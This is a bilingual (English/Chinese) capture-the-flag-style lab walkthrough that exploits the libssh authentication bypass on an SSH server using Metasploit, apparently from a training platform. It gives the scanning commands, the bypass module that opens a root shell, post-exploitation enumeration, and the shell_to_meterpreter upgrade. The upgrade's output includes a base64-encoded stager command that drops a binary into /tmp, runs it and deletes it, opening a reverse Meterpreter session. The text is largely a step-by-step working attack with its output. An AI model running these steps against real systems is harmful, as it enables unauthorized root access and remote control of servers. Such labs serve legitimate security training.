Exploiting A Vulnerable SSH Server
Exploiting SSH
SSH (Secure Shell) is a remote administration protocol that offers encryption and is the successor to Telnet.
It is typically used for remote access to servers and systems.
SSH uses TCP port 22 by default, however, like other services, it can be configured to use any other open TCP port.
libssh is a multiplatform C library implementing the SSHv2 protocol on client and server side.
libssh V0.6.0-0.8.0 is vulnerable to an authentication bypass vulnerability in the libssh server code that can be exploited to execute commands on the target server.
利用易受攻击的 SSH 服务器
利用SSH
SSH(安全外壳)是一种提供加密的远程管理协议,是 Telnet 的后继者。
它通常用于远程访问服务器和系统。
SSH 默认使用 TCP 端口 22,但是,与其他服务一样,它可以配置为使用任何其他开放的 TCP 端口。
libssh 是一个在客户端和服务器端实现 SSHv2 协议的多平台 C 库。
libssh V0.6.0-0.8.0 容易受到 libssh 服务器代码中的身份验证绕过漏洞的攻击,该漏洞可被利用在目标服务器上执行命令。
Demo: Exploiting A Vulnerable SSH Server(演示:利用易受攻击的 SSH 服务器)
In this case, we’ll be taking a look at how to exploit libssh running on the Linux target. And furthermore, we’ll also be exploring the process of obtaining a meterpreter session on the target system by utilizing an exploit module that allows us to exploit this particular vulnerability.
1
2
ifconfig
eth1: inet 192.40.32.2
Start up the PostgreSQL database service, which will allow us to interact with the MySQL or the MSF database.
1
service postgresql start
Start up the Metasploit Framework console.
1
msfconsole
Create a workspace.
1
workspace -a libssh
Set up the global variable for RHOSTS option.
1
setg RHOSTS 192.40.32.3
Perform a Nmap scan on the target system to verify that SSH is indeed running on the target system and that libssh is also running as well.
-sS: Perform a SYN scan.
-sV: Perform a service version detection scan.
-O: Perform an operating system detection scan.
1
db_nmap -sS -sV -O 192.40.32.3
The db_nmap command allows us to perform an Nmap scan from within the MSF console and consequently saves the Nmap scan results into the MSF database within our current workspace.
Access these services.
1
services
Check whether the SSH service is vulnerable.
libssh Authentication Bypass Scanner
libssh Authentication Bypass Scanner
This module exploits an authentication bypass in libssh server code where a USERAUTH_SUCCESS message is sent in place of the expected USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and 0.8.0 through 0.8.3 are vulnerable. Note that this module’s success depends on whether the server code can trigger the correct (shell/exec) callbacks despite only the state machine’s authenticated state being set. Therefore, you may or may not get a shell if the server requires additional code paths to be followed.
libssh 身份验证绕过扫描程序
该模块利用 libssh 服务器代码中的身份验证绕过,其中发送 USERAUTH_SUCCESS 消息代替预期的 USERAUTH_REQUEST 消息。libssh 版本 0.6.0 到 0.7.5 和 0.8.0 到 0.8.3 容易受到攻击。请注意,此模块的成功取决于服务器代码是否可以触发正确的 (shell/exec) 回调,尽管只设置了状态机的身份验证状态。因此,如果服务器需要遵循额外的代码路径,您可能会或可能不会获得 shell。
1
2
3
search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
show options
The option that we want to set is the SPAWN_PTY option, which will allow us to spawn a terminal session.
1
2
set SPAWN_PTY true
run
List out our sessions.
So we’ve successfully been able to exploit the SSH server, and we get a shell session on the target system.
1
sessions 1
Enumerate the user that we currently are.
1
whoami
We are root. So we currently have administrative privileges on the target system.
Enumerate the distribution release version.
1
cat /etc/*release
Enumerate the kernel version.
1
uname -r
The next step will involve the process of upgrading our command shell or our shell session into a meterpreter session, which we can do first and foremost by putting this current session in the background using the keyboard combination Ctrl+z.
We can then search for the post exploitation module shell_to_meterpreter. This will help us upgrade our shell session into a meterpreter session.
We then need to set the LHOST option, which is going to be the Kali Linux IP. Set LHOST to the ethernet1 IP address or the ethernet1 interface IP address.
1
2
3
4
5
use post/multi/manage/shell_to_meterpreter
show options
set LHOST eth1
set SESSION 1
run
1
2
sessions
sessions 2
getuid: Get user id tells us that we currently have root privileges, which consequently means that we do not need to elevate our privileges on the target system.
1
2
meterpreter > sysinfo
meterpreter > getuid
That is how to exploit a vulnerable SSH server.
Vulnerable SSH server
Overview
The target server as described below is running a vulnerable SSH server. Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a Meterpreter shell on the target!
Instructions:
- This lab is dedicated to you! No other users are on this network :)
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-448.pdf
我自己的思路
1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.198.72.2 netmask 255.255.255.0 broadcast 192.198.72.255
ether 02:42:c0:c6:48:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.198.72.3
1
2
3
4
5
6
7
8
root@attackdefense:~# service postgresql start
[ ok ] Starting PostgreSQL 11 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a libssh
[*] Added workspace: libssh
[*] Workspace: libssh
msf5 > setg RHOSTS 192.198.72.3
RHOSTS => 192.198.72.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf5 > db_nmap -sS -sV -O 192.198.72.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-03 10:11 UTC
[*] Nmap: Nmap scan report for target-1 (192.198.72.3)
[*] Nmap: Host is up (0.000047s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh (protocol 2.0)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port22-TCP:V=7.70%I=7%D=2/3%Time=63DCDDE7%P=x86_64-pc-linux-gnu%r(NULL,
[*] Nmap: SF:16,"SSH-2\.0-libssh_0\.8\.3\r\n");
[*] Nmap: MAC Address: 02:42:C0:C6:48:03 (Unknown)
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=2/3%OT=22%CT=1%CU=39471%PV=N%DS=1%DC=D%G=Y%M=0242C0%TM
[*] Nmap: OS:=63DCDDF2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%
[*] Nmap: OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
[*] Nmap: OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
[*] Nmap: OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
[*] Nmap: OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
[*] Nmap: OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
[*] Nmap: OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
[*] Nmap: OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
[*] Nmap: OS:%T=40%CD=S)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 18.13 seconds
1
2
3
4
5
6
7
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.198.72.3 22 tcp ssh open protocol 2.0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf5 > search libssh_auth_bypass
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal Yes libssh Authentication Bypass Scanner
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > show options
Module options (auxiliary/scanner/ssh/libssh_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_BANNER true no Check banner for libssh
CMD no Command or alternative shell
RHOSTS 192.198.72.3 yes The target address range or CIDR identifier
RPORT 22 yes The target port
SPAWN_PTY false no Spawn a PTY
THREADS 1 yes The number of concurrent threads
Auxiliary action:
Name Description
---- -----------
Shell Spawn a shell
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set SPAWN_PTY true
SPAWN_PTY => true
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 192.198.72.3:22 - Attempting authentication bypass
[*] Command shell session 1 opened (192.198.72.2:38423 -> 192.198.72.3:22) at 2023-02-03 10:19:13 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell libssh Authentication Bypass Scanner (SSH-2.0-libssh_0.8.3) 192.198.72.2:38423 -> 192.198.72.3:22 (192.198.72.3)
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions 1
[*] Starting interaction with 1...
[root@victim-1 /]# whoami
whoami
root
[root@victim-1 /]# cat /etc/*release
cat /etc/*release
NAME="Arch Linux"
PRETTY_NAME="Arch Linux"
ID=arch
ID_LIKE=archlinux
ANSI_COLOR="0;36"
HOME_URL="https://www.archlinux.org/"
SUPPORT_URL="https://bbs.archlinux.org/"
BUG_REPORT_URL="https://bugs.archlinux.org/"
[root@victim-1 /]# uname -r
uname -r
5.4.0-125-generic
[root@victim-1 /]# ^Z
Background session 1? [y/N] y
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf5 post(multi/manage/shell_to_meterpreter) > set LHOST eth1
LHOST => 192.198.72.2
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > run
[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.198.72.2:4433
[*] Sending stage (985320 bytes) to 192.198.72.3
[*] Meterpreter session 2 opened (192.198.72.2:4433 -> 192.198.72.3:43780) at 2023-02-03 10:26:41 +0000
[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towMZIAmgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/tRqxX.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/MXLoT' < '/tmp/tRqxX.b64' ; chmod +x '/tmp/MXLoT' ; '/tmp/MXLoT' & sleep 2 ; rm -f '/tmp/MXLoT' ; rm -f '/tmp/tRqxX.b64'"
[-] Output: "[1] 21"
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf5 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell libssh Authentication Bypass Scanner (SSH-2.0-libssh_0.8.3) 192.198.72.2:38423 -> 192.198.72.3:22 (192.198.72.3)
2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.198.72.3 192.198.72.2:4433 -> 192.198.72.3:43780 (192.198.72.3)
msf5 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : 192.198.72.3
OS : (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
